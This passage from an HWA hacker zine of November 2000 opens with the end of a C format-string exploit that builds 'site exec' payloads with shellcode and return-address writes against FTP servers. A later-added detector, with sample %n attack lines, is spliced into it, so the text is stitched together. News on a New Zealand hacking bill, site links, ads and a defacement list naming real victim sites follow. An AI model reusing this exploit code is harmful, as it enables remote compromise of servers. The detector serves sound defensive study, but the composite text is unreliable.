      for(i=0; i < eat; i++) {
      	sprintf(ptr, "%%.f");
          	ptr = &buf[strlen(buf)]; }  
      
      sprintf(ptr,"%%x");
      ptr = &buf[strlen(buf)];
      
      sprintf(ptr,"|");
      ptr = &buf[strlen(buf)];
      	
      sprintf(ptr,"%%x");
      ptr = &buf[strlen(buf)];
      
      sprintf(ptr,"\n");
      
      }
      
      void mksh(void) {
      char *ptr = buf;
      int r1, r2, r3, r4;
      int i;
      
      memset(buf, 0, 1024);
        
      ptr = &buf[strlen(buf)];
      
      sprintf(ptr, "site exec ");
      ptr = &buf[strlen(buf)];
      
      for(i=0; i < strlen(code1);i++) {
      	sprintf(ptr,"%c", code1[i]);
      	ptr = &buf[strlen(buf)]; }
              
      for(i=0; i < eat; i++) {
      	sprintf(ptr, "%%.f");
          	ptr = &buf[strlen(buf)]; }  
      
      r1 = (retn & 0xff);
      r1 |= ((inicio & 0xff00) + 0x100);
      sprintf(ptr,"%%.%dd", r1 - inicio);
      ptr = &buf[strlen(buf)];
      sprintf(ptr,"|%%s"); 
      ptr = &buf[strlen(buf)];
      
      r2 = (retn & 0xff00) >> 8;
      r2 |= ((inicio & 0xff00) + 0x200);
      sprintf(ptr,"%%.%dd", r2 - r1 - 1);
      ptr = &buf[strlen(buf)];
      sprintf(ptr,"%%x");
      ptr = &buf[strlen(buf)];
      
      r3 = (retn & 0xff0000) >> 16;
      r3 |= ((inicio & 0xff00) + 0x300);
      sprintf(ptr,"%%.%dd", r3 - r2 - 1);
      ptr = &buf[strlen(buf)];
      sprintf(ptr,"%%x"); 
      ptr = &buf[strlen(buf)];
      
      r4 = (retn & 0xff000000) >> 24;
      r4 |= ((inicio & 0xff00) + 0x400);
      sprintf(ptr,"%%.%dd", r4 - r3 - 1);
      ptr = &buf[strlen(buf)];
      sprintf(ptr,"%%x"); 
      ptr = &buf[strlen(buf)];
      
      sprintf(ptr,"%s",code3);
      ptr = &buf[strlen(buf)];
      
      sprintf(ptr,"\n");
      
      }
      
      void status(void){
      printf("[ Using values: offset=%x eat=%i align=%i add=%x inicio=%x ]\n",
      toeip, eat, alin, retn, inicio);
      }
      
      // By The Dark Raver      
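      The functions above build "site exec" request lines whose argument is
      a run of printf conversions (%.f, %x, %.Nd, %n). As an added defensive
      example (not part of the original program or of this zine), the C below
      counts such conversions in a SITE EXEC argument so a log monitor can
      flag them, and shows the constant-format call that renders the same
      text inertly. The names scan_ftp_line and render_reply are hypothetical
      and the sample lines are constructed.

```c
/* Added example: detect printf conversions in FTP "SITE EXEC" arguments.
 * scan_ftp_line() and render_reply() are hypothetical names, not from the page. */
#include <ctype.h>
#include <stdio.h>
#include <string.h>

struct fmt_scan {
    int is_site_exec;  /* line is a SITE EXEC request */
    int conversions;   /* printf conversion specifications in its argument */
    int writes;        /* how many of those are %n (store-to-memory) */
};

/* Match lowercase word w at *p (case-insensitive), then skip blanks. */
static int eat_word(const char **p, const char *w)
{
    const char *s = *p;
    for (; *w; w++, s++)
        if (tolower((unsigned char)*s) != *w)
            return 0;
    if (*s && !isspace((unsigned char)*s))
        return 0;
    while (isspace((unsigned char)*s))
        s++;
    *p = s;
    return 1;
}

/* p points just past '%'. Skip flags, width, precision and length modifier;
 * store the conversion character (0 if none) and return where parsing stopped. */
static const char *parse_conv(const char *p, char *conv)
{
    while (*p && strchr("-+ #0'", *p)) p++;
    while (isdigit((unsigned char)*p) || *p == '*' || *p == '$') p++;
    if (*p == '.') {
        p++;
        while (isdigit((unsigned char)*p) || *p == '*' || *p == '$') p++;
    }
    while (*p && strchr("hlLqjzt", *p)) p++;
    if (*p && strchr("diouxXeEfFgGaAcspn", *p)) {
        *conv = *p;
        return p + 1;
    }
    *conv = 0;
    return p;
}

struct fmt_scan scan_ftp_line(const char *line)
{
    struct fmt_scan r = {0, 0, 0};
    const char *p = line;
    char conv;

    while (isspace((unsigned char)*p)) p++;
    if (!eat_word(&p, "site") || !eat_word(&p, "exec"))
        return r;
    r.is_site_exec = 1;
    while (*p) {
        if (*p++ != '%') continue;
        if (*p == '%') { p++; continue; }   /* "%%" is a literal percent */
        p = parse_conv(p, &conv);
        if (conv) {
            r.conversions++;
            if (conv == 'n') r.writes++;
        }
    }
    return r;
}

/* Hardened rendering: the request text is data for a constant format.
 * The defect class is the other form, snprintf(out, n, arg), where the
 * peer's bytes are interpreted as the format itself. */
int render_reply(char *out, size_t n, const char *arg)
{
    return snprintf(out, n, "200-%s", arg);
}

int main(void)
{
    /* Constructed sample lines, not captured traffic. */
    const char *samples[] = {
        "SITE EXEC ls -la\n",
        "site exec aaaa%.f%.f|%x-%x\n",
        "site exec aaaa%.f%.300d%n%.12d%n\n",
        "RETR report%20x.txt\n",
    };
    for (size_t i = 0; i < sizeof samples / sizeof *samples; i++) {
        struct fmt_scan r = scan_ftp_line(samples[i]);
        printf("site_exec=%d conv=%d writes=%d  %s", r.is_site_exec,
               r.conversions, r.writes, samples[i]);
    }
    return 0;
}
```

      Any non-zero conversion count in a SITE EXEC argument is worth an
      alert; a non-zero writes count means the line contains %n.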
      
      @HWA
      
349.0 [IND] Nov 2000 : Opposition to New Zealand hacking bill mounts
      ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
      
      http://www.newsbytes.com/news/00/158161.html
      
      By Adam Creed, Newsbytes
      WELLINGTON, NEW ZEALAND, 15 Nov 2000, 12:23 AM CST

      The New Zealand Greens political party has voiced its opposition to a 
      planned amendment to the country's crime bill that could allow 
      security services to hack into citizens' computers and intercept e-mail 
      and faxes. 

      The long-awaited legislation is mainly intended to criminalize computer 
      hacking in New Zealand. The country has been without specific 
      legislation outlawing malicious hacking. 

      While supporting the main thrust of the planned laws, the Greens do not 
      want to support a law that also gives the police and security 
      services the right to hack into computers and intercept e-mail and faxes. 

      "We won't support interception powers for state agencies, which in the 
      electronic area would be a considerable assault on people's 
      privacy," said a Greens spokesperson, adding that such new powers would be 
      much more open to abuse. 

      "There are serious doubts that such interception would do much to catch 
      criminals," he added. "Real villains can easily avoid detection 
      through using disguised language, encryption, temporary Hotmail addresses, 
      rerouters and unlisted mobile phones. Therefore the cost to public privacy 
      might greatly outweigh the beneficial effect of catching more criminals." 

      He said that "misuse" of the world-wide Echelon interception network 
      already illustrated the potential for privacy violations. 

      Information Minister Paul Swain responded to criticism of the proposed 
      laws by calling for elected representatives to pass a motion that 
      would table the amendment first. 

      He said there would be time to debate the proposed laws when the Bill is 
      referred back to Parliament. 

      "However the overarching purpose of this (amendment) is to make hacking 
      illegal in New Zealand - I think that is vital for every New 
      Zealander who owns a computer. We need to send a strong message that 
      hacking is not cool, it is not clever, it is a serious crime," Swain 
      added. 

      Reported By Newsbytes.com, http://www.newsbytes.com . 

      00:23 CST 

      @HWA      
                   
      
999.9 [HWA] sp00ge! The hidden track. (Free stuff, tips and s3kr3t urls and shit)
      ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
      
      Here's some cool urls, tips tricks and other shit that doesn't fit elsewhere.           
      
      http://www.phonefree.com/  
           
           - Free calls pc-phone within us and pc-pc worldwide, also video and pay
             extra feature options and offers on hardware (headsets etc) check it.
      
      http://www.dialpad.com/ 
           
           - Free calls pc-phone anywhere us <-> us sign up from anywhere in the
             world (use a US address) and make calls to anywhere in the US so it's
             great for foreign users wanting to call US destinations for free over
             the net.. ;)
             
       Not much here, I held back a lot of goodies for the next issue, watch this
       space for 'secret' sites and hints and tip sites. - Ed
       
       @HWA      
             
             
             
                    
                                 
      

AD.S  ADVERTI$ING.       The HWA black market                  ADVERTISEMENT$.
      =-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=
      

      
               ____  _       _              _   ____       _  __
              | __ )| | __ _| |_ __ _ _ __ | |_/ ___|  ___| |/ _|
              |  _ \| |/ _` | __/ _` | '_ \| __\___ \ / _ \ | |_
              | |_) | | (_| | || (_| | | | | |_ ___) |  __/ |  _|
              |____/|_|\__,_|\__\__,_|_| |_|\__|____/ \___|_|_|
              |  _ \ _ __ ___  _ __ ___   ___ | |_(_) ___  _ __
              | |_) | '__/ _ \| '_ ` _ \ / _ \| __| |/ _ \| '_ \
              |  __/| | | (_) | | | | | | (_) | |_| | (_) | | | |
              |_|   |_|  \___/|_| |_| |_|\___/ \__|_|\___/|_| |_|

      

       
       *~`~*|*~`~*[ promo ur site or peddle  ]*~`~*|*~`~*
                                                                 
          ADVERTISING IS FREE TRY AND BE CREATIVE, HWA RESERVES RIGHT TO
          IGNORE YOUR REQUEST (THIS NEVER HAPPENS) READ BELOW FOR .COMS,
          
          SEND YOUR ADS TO CRUCIPHUX@DOK.ORG
       
       
       *~`~*|*~`~*[    your product...       ]*~`~*|*~`~*
       
       Ads run forever or until I get sick of looking at them or
       they die or whatever. Commercial advertising is welcome, we are
       read by several thousand people each issue, higher than some
       print publications. Payment is required for commercial ads, this
       can be monetary (cheque or money order made out to CASH sent to
       the mail drop listed earlier in the zine) or promo goodies or
       * merchandise, we would also be interested in acquiring sponsors
       to promote and fund a Hacker/Security CON in the Southern Ontario
       Canada area since most cons are south of the border and a 
       Canadian con is LONG overdue. 
       
       * Security/COMSEC/IT Networking/Internet related
       
                                  - cruciphux@dok.org
       
       *~`~*|*~`~*[   suck a sore buck       ]*~`~*|*~`~*
       
       

              "Nice boy, but as sharp as a sack of wet mice."
           
                         -- Foghorn Leghorn
  
                                                   ______               __
      _      ___      ___      __ ______________  / __/ /_  ____  ___  / /_
     | | /| / / | /| / / | /| / // ___/ ___/ __ \/ /_/ __/ / __ \/ _ \/ __/
     | |/ |/ /| |/ |/ /| |/ |/ // /__(__  ) /_/ / __/ /__ / / / /  __/ /_
     |__/|__/ |__/|__/ |__/|__(_)___/____/\____/_/  \__(_)_/ /_/\___/\__/
    
         CUBESOFT COMMUNICATIONS IS A PROUD SPONSOR OF THIS PUBLICATION         
     
    * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * **
    *       www.csoft.net webhosting, shell, unlimited hits bandwidth ...    *
    *         www.csoft.net www.csoft.net www.csoft.net www.csoft.net        *
    *                                                                        *
    *                    http://www.csoft.net/                               *
    *                                                                        *
    *             One of our sponsors, visit them now                        *
    *                                                                        * 
    * * * * * * ** * * * * * * * * * * * * * * * * * * * * * * * * * * * * * *
       
       
       

    * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * *
    * 2600.COM OFF THE HOOK LIVE NETCAST'S TUES SIMULCAST ON WBAI IN NYC @8PM *
    * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * *


        

     @HWA
     
       
              
             
HA.HA Humour and puzzles ...etc
      =-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=
      
                                                 Don't worry. worry a *lot*
      
      
      
                                   _ _
                               ___(_) |_ ___ ___
                              / __| | __/ _ Y __|
                              \__ \ | ||  __|__ \
                              |___/_|\__\___|___/       
       
       
     SITE.1
     
     -=- Fun =-
     
     http://www.howtoandroid.com/HowToBuildRobotHead.html
     
     Just go look :) ... - Ed
     
     
     
     -=- Hack/Security -=-
     
     http://root66.nl.eu.org
     
     {} (aka Frank)
     
     -=-= Tech/General -=-
     
     http://www.uk.research.att.com/vnc/
     
     Got windows and need remote admin? check this out...non commercial.
     
     
     
     Cool site!, check it out, complete with interactive 'shell' to the
     root66 box...a must see. -  Ed
     
     
     
     http://users.javanet.com/~alden/indexa.html
     
     phluid (phluid@mindless.com)
     
     Just stumbled across this and what a sweet looking site, you have to
     check it out just to dig the layout/graphics. Very nice, content? well
     have a look around, but do check it out ... - Ed
     
     
     http://www.securax.org/
     
     (Belgium/Dutch)
     
     Submitted by: Zoa_Chien
     
     Nice site, well laid out but unfortunately for many of us it's not in English
     :( ... check it out all the same, news, exploits, latest file list from
     packetstorm, HNN affiliate etc.. - Ed
     
       
     
     -=- Telephony -=-
     
     http://twpyhr.usuck.com .
     
     Jenny
     
     
     Very interesting site for the telephone enthusiast, has lots of rare and
     entertaining recordings of phone system screwups and general messages/
     announcements etc, worth checking out, also check out the answering 
     machine OGM collection :-) fun stuff. - Ed
     
     -=- Employment/Skill testing -=-
     
     http://www.brainbench.com/
     
     Check out this site, test your sysadmin skills, even get certified online!
     post your stats to an online database and give the url to potential 
     employers etc, lots of services ... a must see. - Ed
     
     
     http://cgisecurity.com/
     
     Fledgling security site dealing with cgi and www vulnerabilities run by
     Zenomorph, very good site, much promise, lots of advisories and info
     well worth a visit if you admin a website. - Ed
     
     
                 
     You can send in submissions for this section too if you've found 
     (or RUN) a cool site...
       
        
       
      @HWA
       
         
         
  H.W Hacked websites 
      =-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=
      
      
    ___ ___   _   ___ _  _____ ___  ___ ___ _____ ___ ___ _    ___ ___ _____
   / __| _ \ /_\ / __| |/ / __|   \/ __|_ _|_   _| __/ __| |  |_ _/ __|_   _|
  | (__|   // _ \ (__| ' <| _|| |) \__ \| |  | | | _|\__ \ |__ | |\__ \ | |
   \___|_|_Y_/ \_\___|_|\_\___|___/|___/___| |_| |___|___/____|___|___/ |_|
 
   
                 +-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+
                 |L|4|t|E|S|T|_|W|3|B|_|D|E|F|A|C|E|M|E|N|T|S|
                 +-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+

    
    

      Muse: so where are the hacks with a point? defacing is synonymous with
            teenagers spray bombing urban walls with logos and gang colours
            it seems...what happened to HARP? 
            
            (Enter GForce)
            
          * Hackers Against Racist Propaganda (See issue #7)
          
      [A = Articles accompany mirror]--[M = 'mass' hack]--[C = 'message' in HTML comments]--[K = Free Kevin reference] 
      
                                                                                              November 2000
      
      
       Date      OS Group/Person      AMCK Site                              2000
       ~~~~      ~~ ~~~~~~~~~~~~      ~~~~ ~~~~                            ~~~~~~~~
      
      [00.11.13] NT [m0r0n & nightman]     Syscom Computing Ltd (www.syscom.co.il)
      [00.11.13] NT [m0r0n & nightman]     Eshed Robotec Ltd (www.robotec.co.il)
      [00.11.13] NT [m0r0n & nightman]     TAHAL (Tichnun Ha'Main Le'Israeel) (www.tahal.co.il)
      [00.11.13] Lr [hackweiser]           Oskar (HK) (www.oskar.com.hk)
      [00.11.12] So [xessor]               Jokes.com (www.jokes.com)
      [00.11.12] Lr [NiTR8]                The University Of Isfahan (www.ui.ac.ir)
      [00.11.12] NT [Anti Sec. Hackers] C  PhoenixNet Informatica LTDA (www.phoenixnet.com.br)
      [00.11.12] BI [BrainStorm]           Marcel Franke (www.atacsis.de)
      [00.11.12] NT [prime suspectz]       Biblioteca Leo Falicov (cabbib2.cnea.gov.ar)
      [00.11.12] NT [lion/type_o]          Prime Bank, Pakistan (www.primebank.com.pk)
      [00.11.12] 2k [lion/type_o]          Hafeez Centre (www.hafeezcentre.com.pk)
      [00.11.12] NT [tR|cky]               Shavatz High School (www.savatz.givataim.k12.il)
      [00.11.12] Un [McM4nus]              Conseils Delarive Holding (www.conseil-delarive.ch)
      [00.11.12] Bf [Havoc Korp]           Elite Internet Clans (www.eliteclans.com)
      [00.11.12] Lr [hackweiser]           House of Energy (HK) (www.houseofenergy.com.hk)
      [00.11.12] NT [Anti Security]     C  Comercial São Patricio Ltda. (www.bigbox.com.br)
      [00.11.12] NT [Anti Security]     C  Sebrae, Servico Brasileiro de Apoio a Empresa de P (www.ap.sebrae.com.br)
      [00.11.12] Li [prime suspectz]       Governo do Estado de Rondonia (www.jaru.ro.gov.br)
      [00.11.12] IR [the nobodies]      C  Tsinghua University - Center of Atomic and Molecular Sciences (www.cams.tsinghua.edu.cn)
      [00.11.12] NT [Anti Security]     C  Prodemge Cia Proc Dados do Estado de Minas Gerais (www.ief.mg.gov.br)
      [00.11.12] NT [Brake^Off]            Anes Condos and Villas rentals - Playa del Carmen (www.anes-condos.com.mx)
      [00.11.12] 2k [PHC]                  Jared Baker (www.jaredbaker.com)
      [00.11.12] NT [Brake^Off]            Cancun Tours - Xel-Ha (www.xelha.com.mx)
      [00.11.12] NT [prime suspectz]   M   Colorado K12 Schools (primero.k12.co.us)
      [00.11.12] 2k [prime suspectz]       Oficina Central de Estadística e Informática (www.ocei.gov.ve)
      [00.11.12] NT [CyberPunk]            New Horizons Baja California (www.newhorizons.com.mx)
      [00.11.12] Ir [dhc]                  New York State Government primary Web site (www.state.ny.us)
      [00.11.12] NT [McM4nus]          M   Maerki, Baumann & Co AG (www.mbczh.ch)
      [00.11.12] 2k [predator]         MC  Warez Exchange (www.warezexchange.net)
      [00.11.12] NT [AntihackerlinK]       Harian Umum Republika (www.republika.co.id)
      [00.11.12] 2k [IHA]                  Miller Imaging Juice Server (juice.millercd.com)
      [00.11.12] NT [m0r0n & nightman]     Sivan-North Computer (www.sivan-north.co.il)
      [00.11.12] NT [m0r0n & nightman]     Lantronics Computer Networking Ltd. (www.lantronics.co.il)
      [00.11.11] NT [McM4nus]              Banco Colpatria (www.banco.colpatria.com.co)
      [00.11.11] NT [prime suspectz]       Inprise (www.inprise.ca)
      [00.11.11] NT [IZ Corp]              Massachusetts Institute of Technology (cliq.mit.edu)
      [00.11.11] NT [prime suspectz]       Proderj - Centro de processamento de Dados do RJ (sintegra.sef.rj.gov.br)
      [00.11.11] NT [prime suspectz]       Borland (CA) (www.borland.ca)
      [00.11.11] NT [xrev]                 Woops Ltda (www.woops.com.br)
      [00.11.11] 2k [prime suspectz]       Home Page do Derba (www.derba.ba.gov.br)
      [00.11.11] NT [eniac]                Museum of Alfons Mucha (www.mucha.cz)
      [00.11.11] Ir [r0b1n h00d slu7]      Quelle (www.quelle.com.cn)
      [00.11.11] NT [McM4nus]              Banco Agricola de El Salvador (www.bancoagricola.com)
      [00.11.11] Li [Crime Boys]           Centro Pastoral, Educacional e Assistencial "Dom Carlos" (www.cpea.br)
      [00.11.11] Lr [fluffy bunny]     M   Knight Networking and Web Design (ww1.knightnetworking.com)
      [00.11.11] Lr [fluffy bunny]     M   Linear Systems, Inc. (lottohost.spiritusa.net)
      [00.11.11] So [Crime Boys]           NETZONE,Co. Ltd (www.netzone.co.kr)
      [00.11.11] NT [frenet1k]             Bradford College (bradford.edu)
      [00.11.11] NT [prime suspectz]       Administracao do Porto de São Francisco do Sul (www1.apsfs.sc.gov.br)
      [00.11.11] NT [m0r0n/nightman]       PC center (www.pc-center.co.il)
      [00.11.11] 2k [AntihackerlinK]       PT. Texmaco Jaya (www.texmaco.co.id)
      [00.11.11] NT [IHA]                  Washington D.C. Department of Employment Services (mail.does.dcgov.org)
      [00.11.11] NT [ReDPriest]        M   Florida State University Center for Professional Development LAB (www.cpdlab.fsu.edu)
      [00.11.11] NT [tR|cky]               Open University - Jerusalem (jccopenu.ac.il)
      [00.11.11] NT [ReDPriest]            UIUC Department of Kinesiology (kines-freer.kines.uiuc.edu)
      [00.11.11] NT [tR|cky]               Zefat Regional College (www.zrc.ac.il)
      [00.10.11] NT [Anti-401 Crew]    M   Outerline (www.outerline.com)
      [00.11.10] NT [ReALiSt]              Infinity Egypt (www.infinity.com.eg)
      [00.11.10] NT [neon-lenz]            Amsterdam Hotels (www.amsterdam-hotels.nl)
      [00.11.10] NT [prime suspectz]       Naval Pacific Meteorology and Oceanography Center, Yokosuka, Japan (www.yoko.npmoc.navy.mil)
      [00.11.10] Ir [prime suspectz]       Ultra Park Estacionamento e Lavarapido Ltda (www.tudofacil.com.br)
      [00.11.10] NT [prime suspectz]       Governo Do Estado Do Mato Grosso (www.pgj.mt.gov.br)
      [00.11.10] NT [philer]               Nichols Dollar Saver (www.nicholsdollarsaver.com)
      [00.11.10] NT [prime suspectz]       US Bureau of Reclamation (www.mp.usbr.gov)
      [00.11.10] So [telconinjas]          Scenewhores (www.scenewhores.net)
      [00.11.10] NT [prime suspectz]       Bernalillo County (www.bernco.gov)
      [00.11.10] NT [philer]               Sprout Communications (www.chiossone.com)
      [00.11.10] NT [prime suspectz]       Governo Do Estado do Mato Grosso (servicos.detran.mt.gov.br)
      [00.11.10] NT [prime suspectz]       Ebay Taiwan (www.ebay.com.tw)
      [00.11.10] IR [Crime Boys]       M   Banco PSA Finance do Brasil S.A (www.bancopsa.com.br)
      [00.11.10] NT [HF]               M   BusinessNet (www.businessnet.com.ar)
      [00.11.10] NT [prime suspectz]       #2 Technical Info, Jet Propulsion Labs (NASA) (techinfo.jpl.nasa.gov)
      [00.11.10] NT [Hackweiser]           Hyundai Information Technology Co., Ltd. (www.hdcorp.hyundai.net)
      [00.11.10] Bf [Ne[r0]                NTV Corp (moped.ntvi.ru)
      [00.11.10] NT [neon-lenz]            Yellow-White (www.yellowwhite.nl)
      [00.11.10] Lr [hackweiser]           Bagz (HK) (www.bagz.com.hk)
      [00.11.10] 2k [tR|cky]               Western-Galilee College (wgalil.ac.il)
      [00.11.09] NT [prime suspectz]       NEC (TW) (www.nec.com.tw)
      [00.11.09] Li [r0b1n h00d slu7]  M   Cooper Consulting (www.cooperconsulting.com)
      [00.11.09] NT [anti security]     C  TV Fronteira Paulista Ltda (www.tvfronteira.com.br)
      [00.11.09] NT [WiNeGuM]              Bray County, Ireland (www.bray.ie)
      [00.11.09] Li [r0b1n h00d slu7]      Bradley Development (www.circlecranch.com)
      [00.11.09] NT [prime suspectz]       Visa International (www.visa.de)
      [00.11.09] NT [prime suspectz]       ASICS Corporation (www.asics.co.jp)
      [00.11.09] Ir [prime suspectz]       Integris (www.integris.com.br)
      [00.11.09] NT [HF]               M   Platao Servicos Graficos Ltda (www.aeroway.com.br)
      [00.11.09] NT [zigfred/hardcore]     Servico Social Do Comercio-Sesc Ar/Rondonia (www.sesc-ro.com.br)
      [00.11.09] 2k [HackersFamily]        Mash industria e comercio Ltda. (www.sabesabe.com.br)
      [00.11.09] NT [r00t.br]              ACS (www.acs.co.il)
      [00.11.09] So [sil0]                 Electra2 (www.electra2.co.uk)
      [00.11.09] NT [m0r0n & nightman]     Interwise Campus (www.interwise-campus.co.il)
      [00.11.09] NT [m0r0n & nightman]     ScanMaster (www.irt.co.il)
      [00.11.09] So [sil0]                 Check Your Credit (www.checkyourcredit.co.uk)
      [00.11.09] NT [m0r0n & nightman]     KIS Technologies (www.kis.co.il)
      [00.11.09] 2k [Reve|at|on]       M   Spattered Ink (spatteredink.com.au)
      [00.11.09] 2k [rapeworm]             Eduk8 (www.eduk8.com.au)
      [00.11.09] 2k [rapeworm]             All Clubs and Star Listings (allclubs.com.au)
      [00.11.09] NT [JaCo]                 Spendless (www.spendless.co.il)
      [00.11.08] IR [Anti Security]    M   Florida State University (www.iri.fsu.edu)
      [00.11.08] Bf [Crazy Horse]          Peter Fielding Photography (www.mountainimagery.com)
      [00.11.08] 2k [prime suspectz]       www.nasa.com.uy (www.nasa.com.uy)
      [00.11.08] NT [kbr]                  Governo Do Estado De Sao Paulo (www.fundap.sp.gov.br)
      [00.11.08] NT [Gforce Pakistan]      Terminal - Computers & Multimedia (www.terminal.co.il)
      [00.11.08] NT [prime suspectz]       Nextel Telecomunicacoes (www.nextel.com.br)
      [00.11.08] Ir [DHC]              M   SZ Audit (www.szaudit.org.cn)
      [00.11.08] NT [Gforce Pakistan]      Rooster (mail.rooster.co.il)
      [00.11.08] Sc [Havoc Korp]           New England Club Managers Association (www.necma.org)
      [00.11.08] NT [Gforce Pakistan]      Radwiz (IL) (www.radwiz.co.il)
      [00.11.08] NT [Dcoder]               Pilipino Telephone Corporation Official Website (homepage.piltel.com.ph)
      [00.11.08] UN [Halik]                Government Printing Office (www.gpo.gov)
      [00.11.08] Li [r0b1n h00d slu7]      Foto Concepts (www.foto-concepts.de)
      [00.11.08]    [prime suspectz]       Asics (www.asics.co.za)
      [00.11.08] NT [azndragon]            EcoNet (dns.econet.it)
      [00.11.08] NT [m0r0n/nightman]       Gvanim Financim, Kibutz Shefayim Israel (www.gvanim.co.il)
      [00.11.08] NT [m0r0n/nightman]       Hed-Arzi (www.hed-arzi.co.il)
      [00.11.08] NT [tR|cky]           MC  Order in a Click (www.order-click.co.il)
      [00.11.08] NT [Gforce Pakistan]      KIS Technologies (www.kisnet.co.il)
      [00.11.08] NT [aniclator]            United States Geological Survey (mrdata.usgs.gov)
      [00.11.08] NT [Gforce Pakistan]      Ornetix (ntserver.ornetix.co.il)
      [00.11.08] Ir [Crime Boys]           Aiman Co (www.aimanco.com.cn)
      [00.11.08] Li [Web Claws]        M   Accueil Scorp - Motorsport (www.scorpmotorsport.com)
      [00.11.08] NT [Gforce Pakistan]      Chamber  (IL) (www.chamber.org.il)
      [00.11.08] NT [prime suspectz]       Presidencia de la República de Mexico (www.presidencia.gob.mx)
      [00.11.08]    [GForce Pakistan]      University of Michigan Transportation Research Institute
      [00.11.08] Lr [pakistan is gay]      Urmia University in Iran (mail.urmia.ac.ir)
      [00.11.08] NT [Anti-401 Crew]        Toronto Zionist Council (www.torzc.org)
      [00.11.07]    [Fenrir]               TGIF Online (www.tgifonline.com)
      [00.11.07] Lr [philer]               Detroit Tradesmen (www.detroittradesmen.com)
      [00.11.07] Bi []                     Webdesign (www.opsaal.de)
      [00.11.07] NT [AnIcLaToR]            Departamento Nacional de Producao Mineral (www.dnpm.gov.br)
      [00.11.07] NT [m0r0n/nightman]       Efrat DSP Group (www.efratdsp.co.il)
      [00.11.07] NT [AnIcLaToR]            Aneel-Agencia Nacional de Energia Eletrica (hidroweb.aneel.gov.br)
      [00.11.07] NT [m0r0n & nightman]     Elgev Electronics (www.elgev.co.il)
      [00.11.07] NT [AnIcLaToR]            Governo Do Estado De Sao Paulo (www2.fazenda.sp.gov.br)
      [00.11.07] NT [prime suspectz]       #4 Australian Broadcasting Authority (www.aba.gov.au)
      [00.11.07] NT [RB Team]              Ministerio de Comercio Exterior de Costa Rica (www.comex.go.cr)
      [00.11.07] Li [r00tshell]            No BMW Syndrome (www.nobmwsyndrome.com)
      [00.11.07] NT [Anti Security]     C  DFM - FFCLRP - USP Ribeirão (dfm.ffclrp.usp.br)
      [00.11.07] Li [r0b1n h00d slu7]  M   Scottish Right Dormitory (www.srd.org)
      [00.11.07] NT [ ]               A    Microsoft Events server (events.microsoft.com)
      [00.11.07] NT [thepr0digy]           National Library of Australia (webpac.nla.gov.au)
      [00.11.07] NT [syf]              M   Gerber Landscape (www.gerberco.com)
      [00.11.06] NT []                  C  Republican National Committee (www.gop.org)
      [00.11.06] NT [ScorpionKTX]          Confeccoes Simon-Brain Ltda (www.pitt.com.br)
      [00.11.06] So [GForce Pakistan]      Torah Educator (www.toraheducator.org)
      [00.11.06] Li [GForce Pakistan]      CentExchange (www.centexchange.com)
      [00.11.06] NT [prime suspectz]       Partido Da Social Democracia (www.psdb.org.br)
      [00.11.06] Li []                     Squadpage Online Gaming (www.squadpage.com)
      [00.11.06] Li [r0b1n h00d slu7]   C  Ball & Chain Industries (www.tonguejoy.com)
      [00.11.06] NT [prime suspectz]   M   Nintendo (ZA) (www.nintendo.co.za)
      [00.11.06] So [GForce Pakistan]      Borha Torah (www.borhatorah.org)
      [00.11.06] NT [Prime Suspectz]       Nintendo Mexico (www.nintendo.com.mx)
      [00.11.06] NT []                     ICCU (iccu.sbn.it)
      [00.11.06] NT [anti security]     C  Web Tecnologia Servicos e Comercio (www.estudioweb.com.br)
      [00.11.06] Li [robin hood slut]      The Robinson Group (www.theadmiral.com)
      [00.11.06] So [GForce Pakistan]      Partners in Torah (www.partnersintorah.org)
      [00.11.06] Lr [hooyah]           M   Knowledge House Inc. (nsdev3.knowledgehouse.net)
      [00.11.05] IR [Ezkracho]             Manuel Luis Zamudio Rodríguez (www.redmkt.com)
      [00.11.05] NT [prime suspectz]   M   MINISTERIO DO TRABALHO (www.mte.gov.br)
      [00.11.05] Li [r0b1n h00d]           Hotel - Gasthof Kirchmayer (www.kirchmayer.de)
      [00.11.05] So [brain storm]          STUDIO DE TATOUAGE CRYSTAL MAGIC ENR. (www.studiocrystalmagic.com)
      [00.11.05] Lb [g0mb0]                InfoCon Mongola (www.infocon.mn)
      [00.11.05] So [GForce Pakistan]      Jerusalem Books (www.jerusalembooks.com)
      [00.11.05] NT [prime suspectz]   M   Kenwood Chile (www.kenwood.cl)
      [00.11.05] Li [r0bb1n h00d]          Blue Moon Security (www.bluemoonsecurity.de)
      [00.11.05] NT [lion & type_o]     C  Shaheed Zulfiqar Ali Bhutto Institute of Science and Technology (www.szabist.edu.pk)
      [00.11.05] NT [IHA]                  National Tax Association (www.ntanet.org)
      [00.11.05] NT [AnIcLaToR]        M   Zoomix Suplementação Animal Ltda (www.zoomix.com.br)
      [00.11.05] 2k [brake off]            James Raddock (www.raddock.com)
      [00.11.05] Li [Mr.P]             M   Kelley Studios (www.marilynfineart.com)
      [00.11.05] Li [EVIL ANGELICA]        Mirage Television Productions (www.miragetv.com)
      [00.11.05] NT [prime suspectz]       www.figc.it (www.figc.it)
      [00.11.05] NT [SqiSch/zEp]       M   E.C.C. Europe Class Computing S.r.l. (alessiamarcuzzi.com)
      [00.11.05] Lr [Di_QuIp]              wizard.darkzone.trzepak.pl (wizard.darkzone.trzepak.pl)
      [00.11.05] So [GForce Pakistan]   C  All-Kosher Indexof the United Kashrut Authority (www.kosher.co.il)
      [00.11.05] NT [prime suspectz]   M   MCOM Diagnosticos por Imagem S/C Ltda (www.mama.com.br)
      [00.11.05] NT [Galahad]          M   Michlala L'hachsharat Morim (skbb4.skb2.macam.ac.il)
